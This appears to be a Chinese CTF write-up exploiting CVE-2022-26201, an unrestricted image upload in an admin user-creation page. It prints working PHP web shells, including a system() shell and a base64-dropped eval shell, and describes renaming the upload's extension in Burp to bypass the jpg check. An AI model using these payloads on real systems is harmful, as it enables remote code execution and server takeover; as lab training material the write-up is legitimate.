CVE-2022-26201

打开是这么个页面

左上角找到Admin访问

里面有个Add Users,访问一下,能创建用户,有个能上传图片的地方

普通的一句话木马无法访问flag,需要创建一个权限马

<?php system($_GET[1]);phpinfo();?>

因为只能上传jpg形式的文件,所以更改文件后缀名为jpg

使用bp抓包,更改后缀为php,使用重放器发送

上传成功

访问img/上传的php文件名 /flag,得到flag:flag{a71683b4-9a2d-4288-b8f3-25d10816b1c0}

第二种方法使用蚁剑马连接

一句话木马是有防护的,所以我们要利用php和base64来构造一个特殊马来进行连接:

base64先对一句话木马加密<?php @eval($_POST['a']);?>

木马内容:

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+'));

?>

然后跟上边一样bp抓包改包,重放器发送

生成shell.php文件,木马是以base64的形式。

蚁剑路径为img/shell.php,编码器为base6,根目录下找到flag

相关推荐
小白勇闯网安圈8 小时前
bug、Confusion1、ics-07、
网络安全·php·web
闲人编程9 小时前
后台任务与WebSocket实时应用
websocket·web·实时·codecapsule·后台协议·实时应用
小白勇闯网安圈1 天前
supersqli、web2、fileclude、Web_python_template_injection
python·网络安全·web
小白勇闯网安圈1 天前
Training-WWW-Robots、command_execution、baby_web、xff_referer
网络安全·web
wyjcxyyy1 天前
Polar-MISC-WEB(困难)
web·ctf·misc·polar
小白勇闯网安圈1 天前
unserialize3、php_rce、Web_php_include、warmup、NewsCenter
sql·网络安全·web
小白勇闯网安圈2 天前
file_include、easyphp、ics-05
网络安全·php·web
这儿有一堆花2 天前
汇率更新背后的残酷逻辑
web
wgego2 天前
Polar靶场web 随写笔记
笔记·web
曲幽2 天前
Flask 应用部署实战:Nginx 反向代理配置指南
python·nginx·web·gunicorn·wsgi